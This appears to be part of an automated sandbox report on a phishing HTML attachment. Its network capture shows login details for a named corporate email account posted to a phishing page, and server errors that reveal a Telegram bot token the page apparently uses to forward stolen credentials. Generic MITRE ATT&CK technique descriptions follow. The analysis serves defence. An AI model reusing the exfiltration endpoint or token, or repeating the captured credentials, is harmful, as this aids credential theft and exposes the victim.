Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:03:07 UTC	401	OUT	GET /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
2025-01-22 11:03:07 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Wed, 22 Jan 2025 11:03:07 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:03:07 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49890	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:03:22 UTC	633	OUT	POST /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive Content-Length: 51 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:03:22 UTC	51	OUT	Data Raw: 61 69 3d 61 6e 6e 61 2e 64 75 65 72 6b 73 65 6e 25 34 30 62 62 72 61 75 6e 2e 63 6f 6d 26 70 72 3d 77 21 25 37 44 5a 4c 79 55 5f 51 63 67 6f 68 77 49 51 Data Ascii: ai=anna.duerksen%40bbraun.com&pr=w!%7DZLyU_QcgohwIQ
2025-01-22 11:03:39 UTC	571	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=4ndu5i5efhrsqf15rijkjslk5q; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 900 date: Wed, 22 Jan 2025 11:03:39 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:03:39 UTC	900	IN	Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 35 35 37 34 31 32 36 39 39 3a 41 41 48 6c 6b 42 32 6c 5a 69 50 49 6d 74 45 51 71 4a 77 4c 68 68 37 6e 55 68 69 71 76 36 48 35 6e 69 63 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 63 6f 70 62 6c 77 68 69 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 74 73 6b 2f 78 6c 73 2f 6c 6f 67 69 6e 2e 70 68 70 3c 2f 62 Data Ascii: <br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7557412699:AAHlkB2lZiPImtEQqJwLhh7nUhiqv6H5nic/sendMessage): Failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/copblwhi/public_html/tsk/xls/login.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49995	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:03:39 UTC	401	OUT	GET /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
2025-01-22 11:03:40 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Wed, 22 Jan 2025 11:03:40 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:03:40 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	50045	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:04:08 UTC	633	OUT	POST /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive Content-Length: 51 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:04:08 UTC	51	OUT	Data Raw: 61 69 3d 61 6e 6e 61 2e 64 75 65 72 6b 73 65 6e 25 34 30 62 62 72 61 75 6e 2e 63 6f 6d 26 70 72 3d 77 21 25 37 44 5a 4c 79 55 5f 51 63 67 6f 68 77 49 51 Data Ascii: ai=anna.duerksen%40bbraun.com&pr=w!%7DZLyU_QcgohwIQ
2025-01-22 11:04:24 UTC	571	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=sq8ggh2c3sq9a58l7kb0gsehf4; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 900 date: Wed, 22 Jan 2025 11:04:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:04:24 UTC	900	IN	Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 35 35 37 34 31 32 36 39 39 3a 41 41 48 6c 6b 42 32 6c 5a 69 50 49 6d 74 45 51 71 4a 77 4c 68 68 37 6e 55 68 69 71 76 36 48 35 6e 69 63 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 63 6f 70 62 6c 77 68 69 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 74 73 6b 2f 78 6c 73 2f 6c 6f 67 69 6e 2e 70 68 70 3c 2f 62 Data Ascii: <br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7557412699:AAHlkB2lZiPImtEQqJwLhh7nUhiqv6H5nic/sendMessage): Failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/copblwhi/public_html/tsk/xls/login.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	50046	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:04:24 UTC	401	OUT	GET /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
2025-01-22 11:04:25 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Wed, 22 Jan 2025 11:04:25 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:04:25 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	50047	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:05:06 UTC	633	OUT	POST /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive Content-Length: 51 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: application/json, text/javascript, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-22 11:05:06 UTC	51	OUT	Data Raw: 61 69 3d 61 6e 6e 61 2e 64 75 65 72 6b 73 65 6e 25 34 30 62 62 72 61 75 6e 2e 63 6f 6d 26 70 72 3d 77 21 25 37 44 5a 4c 79 55 5f 51 63 67 6f 68 77 49 51 Data Ascii: ai=anna.duerksen%40bbraun.com&pr=w!%7DZLyU_QcgohwIQ
2025-01-22 11:05:23 UTC	571	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 set-cookie: PHPSESSID=kcdpbspel81fjnvhaisce4ebo3; path=/; secure expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 900 date: Wed, 22 Jan 2025 11:05:22 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:05:23 UTC	900	IN	Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 66 69 6c 65 5f 67 65 74 5f 63 6f 6e 74 65 6e 74 73 28 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 37 35 35 37 34 31 32 36 39 39 3a 41 41 48 6c 6b 42 32 6c 5a 69 50 49 6d 74 45 51 71 4a 77 4c 68 68 37 6e 55 68 69 71 76 36 48 35 6e 69 63 2f 73 65 6e 64 4d 65 73 73 61 67 65 29 3a 20 46 61 69 6c 65 64 20 74 6f 20 6f 70 65 6e 20 73 74 72 65 61 6d 3a 20 48 54 54 50 20 72 65 71 75 65 73 74 20 66 61 69 6c 65 64 21 20 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 63 6f 70 62 6c 77 68 69 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 74 73 6b 2f 78 6c 73 2f 6c 6f 67 69 6e 2e 70 68 70 3c 2f 62 Data Ascii: <br /><b>Warning</b>: file_get_contents(https://api.telegram.org/bot7557412699:AAHlkB2lZiPImtEQqJwLhh7nUhiqv6H5nic/sendMessage): Failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in <b>/home/copblwhi/public_html/tsk/xls/login.php</b

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	50048	162.0.209.120	443	8080	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-22 11:05:24 UTC	401	OUT	GET /tsk/xls/login.php HTTP/1.1 Host: copbtech.store Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=5dk3mc9e2i0elqd2p9l9kj4kvm
2025-01-22 11:05:24 UTC	504	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.1.31 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache access-control-allow-origin: * access-control-allow-methods: POST, GET, OPTIONS access-control-allow-headers: Content-Type, Authorization, X-Requested-With content-type: application/json content-length: 63 date: Wed, 22 Jan 2025 11:05:24 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2025-01-22 11:05:24 UTC	63	IN	Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d Data Ascii: {"status":"error","message":"Email and password are required."}

Target ID:	0
Start time:	06:02:09
Start date:	22/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\ATT-897850.htm"
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	06:02:14
Start date:	22/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2356 --field-trial-handle=2204,i,15932215247810093404,10260536024107486679,262144 /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ATT-897850.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Data Obfuscation

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Chrome Cache Entry: 82

Chrome Cache Entry: 83

Chrome Cache Entry: 84

Chrome Cache Entry: 85

Chrome Cache Entry: 86

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
ATT-897850.htm